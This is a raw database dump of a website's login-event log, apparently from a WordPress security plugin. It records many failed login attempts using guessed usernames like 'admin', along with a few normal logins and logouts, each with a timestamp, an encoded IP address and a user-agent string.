(9781, 41678, 1701287074.819574, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½þ', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9467, 34035, 1697092972.197518, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ^B³O', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),
(9841, 42172, 1701370503.657233, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9460, 33917, 1696926270.853444, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿn?M', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),
(9842, 42173, 1701370526.248651, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¹Š', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9461, 33918, 1696926272.440190, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿn?M', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),
(9462, 33919, 1696926274.082400, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿn?M', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),
(9457, 33864, 1696799182.441987, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾SD', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9458, 33865, 1696799184.401594, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾SD', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9455, 33853, 1696683978.340136, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿhãi', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),
(9459, 33866, 1696799186.211299, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾SD', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9456, 33854, 1696683981.972264, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿhãi', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),
(9463, 33920, 1696926275.689521, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿn?M', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),
(9449, 33684, 1695863124.833768, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ–ž]1', 'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),
(9464, 33921, 1696926277.101271, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿn?M', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),
(9450, 33685, 1695863126.725154, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ–ž]1', 'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),
(9451, 33686, 1695863128.597117, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ–ž]1', 'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),
(9452, 33687, 1695863131.436877, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ–ž]1', 'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),
(9453, 33688, 1695863133.331147, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ–ž]1', 'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),
(9454, 33689, 1695863135.241619, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ–ž]1', 'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),
(9465, 33922, 1696926278.624703, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿn?M', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),
(10247, 49910, 1710844978.356697, 1, 'loginFailInvalidUsername', 'Admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÂ£#', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0'),
(10248, 49911, 1710844979.258264, 1, 'loginFailInvalidUsername', 'zokaroll', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\Íñ', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6'),
(10249, 49912, 1710844979.623657, 1, 'loginFailInvalidUsername', 'blog', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ½½''', 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0'),
(10250, 49930, 1710871822.323036, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÌ0°', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(10251, 49931, 1710871825.091593, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿþ˜a', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0'),
(9984, 45009, 1705097671.780020, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9980, 45004, 1705070904.591308, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9985, 45010, 1705098387.515540, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9981, 45005, 1705071396.667490, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9978, 44989, 1704989429.637557, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9979, 44990, 1704990644.343081, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9976, 44919, 1704894756.886067, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ”ü€´', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9975, 44724, 1704604626.081512, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ@ã´]', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9977, 44932, 1704897333.351585, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ”ü€´', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9982, 45007, 1705087646.328296, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9880, 42437, 1701502081.214043, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb:M', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0'),
(9530, 38210, 1700460752.558864, 1, 'loginFailInvalidUsername', 'user', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿeç', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),
(9532, 38321, 1700553370.087042, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÔ$È', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9527, 37837, 1700375381.290682, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆY', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),
(9533, 38342, 1700569829.948163, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9528, 38069, 1700405791.841074, 1, 'loginFailInvalidUsername', 'degrueda', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŸß7b', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(9529, 38140, 1700437038.168762, 1, 'loginFailInvalidUsername', 'test', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¨wP', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),
(9534, 38447, 1700580544.915490, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿv¤Š', 'Mozilla/5.0'),
(9535, 38448, 1700580907.175788, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9536, 38465, 1700589026.734736, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆY', 'Mozilla/5.0'),
(9537, 38475, 1700596480.476100, 1, 'loginFailInvalidUsername', 'support', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿeÑ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),
(9520, 37481, 1700282795.004694, 1, 'loginFailInvalidUsername', 'howtobehappysecrets', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿuéó©', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9521, 37631, 1700317051.022085, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9522, 37633, 1700317429.073999, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9523, 37637, 1700324253.549959, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-VÊ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9524, 37638, 1700324256.749244, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-VÊ-', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9525, 37639, 1700324285.387684, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-VÊ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9526, 37753, 1700360175.038989, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼Ö˜é', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45'),
(9538, 38506, 1700622326.507602, 1, 'loginFailInvalidUsername', 'ssrvvven', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ"¢R*', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(9511, 37264, 1700249454.930452, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿv¤Š', 'Mozilla/5.0'),
(9512, 37404, 1700268972.879249, 1, 'loginFailInvalidUsername', 'stender', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹6¸f', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9513, 37406, 1700269090.922904, 1, 'loginFailInvalidUsername', 'wpcore', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ?ú&Ä', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9514, 37410, 1700271227.852201, 1, 'loginFailInvalidUsername', 'username', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÀñùí', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9993, 45485, 1705515705.683535, 1, 'loginFailInvalidUsername', 'comparador-productos', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿK!', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(9997, 45505, 1705598018.084656, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'),
(10001, 45597, 1705821980.557003, 1, 'loginFailInvalidUsername', 'crystal', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-ŠU', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),
(10002, 45598, 1705821986.243526, 1, 'loginFailInvalidUsername', 'crystal', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-ŠU', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),
(10003, 45599, 1705821986.321031, 1, 'loginFailInvalidUsername', 'handsome110110', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-ŠU', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),
(10004, 45600, 1705821991.045370, 1, 'loginFailInvalidUsername', 'crystal', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-ŠU', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),
(10005, 45601, 1705821991.759903, 1, 'loginFailInvalidUsername', 'handsome110110', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-ŠU', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),
(10006, 45602, 1705821996.451941, 1, 'loginFailInvalidUsername', 'crystal', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-ŠU', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),
(10007, 45603, 1705821996.734934, 1, 'loginFailInvalidUsername', 'handsome110110', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-ŠU', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),
(10008, 45604, 1705822002.256680, 1, 'loginFailInvalidUsername', 'handsome110110', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-ŠU', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),
(10009, 45605, 1705822002.739142, 1, 'loginFailInvalidUsername', 'crystal', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-ŠU', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),
(10010, 45606, 1705822006.953264, 1, 'loginFailInvalidUsername', 'handsome110110', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-ŠU', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),
(10011, 45607, 1705822007.361074, 1, 'loginFailInvalidUsername', 'crystal', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-ŠU', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),
(10051, 47101, 1707008489.269348, 1, 'loginFailInvalidUsername', 'wordpress_administratora', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ2>8a', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10052, 47102, 1707008528.581477, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŠÅ,ø', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10053, 47103, 1707008529.366009, 1, 'loginFailInvalidUsername', 'user', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŠÅ,ø', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10054, 47104, 1707008563.670092, 1, 'loginFailInvalidUsername', 'xuanphong', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŠDøš', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10055, 47105, 1707008564.237442, 1, 'loginFailInvalidUsername', 'miruku', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŠDøš', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10056, 47106, 1707008595.994459, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ"ß„', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10057, 47107, 1707008596.592920, 1, 'loginFailInvalidUsername', 'excontrol', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ"ß„', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10058, 47108, 1707008625.452086, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ3ÿOl', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10059, 47109, 1707008625.600403, 1, 'loginFailInvalidUsername', 'wp', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ3ÿOl', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10060, 47110, 1707008625.950228, 1, 'loginFailInvalidUsername', 'wp-admine', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ2>±«', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10061, 47111, 1707008625.958038, 1, 'loginFailInvalidUsername', 'yeuthuongmongmanh', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ2>±«', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10062, 47112, 1707008652.092692, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ"“Ç$', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10063, 47113, 1707008652.885121, 1, 'loginFailInvalidUsername', 'zestful', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ"“Ç$', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10064, 47114, 1707008685.147553, 1, 'loginFailInvalidUsername', 'lashkari', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ4!ñ', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10065, 47115, 1707008685.445596, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿµ<', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10066, 47116, 1707008685.521913, 1, 'loginFailInvalidUsername', 'ac', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ4!ñ', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10067, 47117, 1707008685.626094, 1, 'loginFailInvalidUsername', 'swilliams', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿµ<', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10068, 47120, 1707008686.895127, 1, 'loginFailInvalidUsername', 'zymppg4f@gmail.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿºàDF', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10069, 47121, 1707008686.988859, 1, 'loginFailInvalidUsername', 'wpsystem', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿºàDF', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10070, 47122, 1707008702.962568, 1, 'loginFailInvalidUsername', 'Vikash', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿD·¹s', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10071, 47123, 1707008702.966718, 1, 'loginFailInvalidUsername', 'happy', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿD·¹s', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10072, 47122, 1707008702.979871, 1, 'loginFailInvalidUsername', 'Vikash', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿD·¹s', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10073, 47124, 1707008726.530235, 1, 'loginFailInvalidUsername', 'Sion', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÀñùí', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(10074, 47125, 1707008727.116337, 1, 'loginFailInvalidUsername', 'wp_postadmin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÀñùí', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9929, 44350, 1704407466.741970, 1, 'loginFailInvalidUsername', 'wadminw', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ=ú', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9953, 44372, 1704424494.366236, 1, 'loginFailInvalidUsername', 'miruku', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÀþú±', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9930, 44351, 1704407466.818657, 1, 'loginFailInvalidUsername', 'wpadmin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ=ú', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9931, 44352, 1704407536.985023, 1, 'loginFailInvalidUsername', 'wordcamp', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ3KÊG', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9932, 44353, 1704407537.534641, 1, 'loginFailInvalidUsername', 'wpenginesupport', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ3KÊG', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9933, 44354, 1704407548.580877, 1, 'loginFailInvalidUsername', 'wpmanager', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿºêP\r', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9934, 44355, 1704407548.684513, 1, 'loginFailInvalidUsername', 'woopayplug', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿºêP\r', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9935, 44356, 1704407597.161698, 1, 'loginFailInvalidUsername', 'hostingadmin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŸA¦Ç', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9936, 44357, 1704407635.756807, 1, 'loginFailInvalidUsername', '1001010', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ­ÛHÝ', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9937, 44358, 1704407636.432152, 1, 'loginFailInvalidUsername', 'adminlin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ­ÛHÝ', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
